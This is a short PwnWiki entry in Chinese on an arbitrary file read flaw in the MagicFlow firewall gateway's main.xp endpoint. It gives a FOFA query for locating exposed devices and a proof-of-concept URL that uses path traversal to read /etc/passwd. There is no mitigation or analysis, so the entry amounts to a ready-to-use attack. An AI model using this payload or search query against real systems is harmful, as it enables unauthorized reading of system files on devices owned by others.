MagicFlow 防火牆網關 main.xp 任意文件讀取漏洞

From PwnWiki
Other languages:

漏洞影響

MagicFlow 防火牆網關

FOFA

app="MSA/1.0"

POC

/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd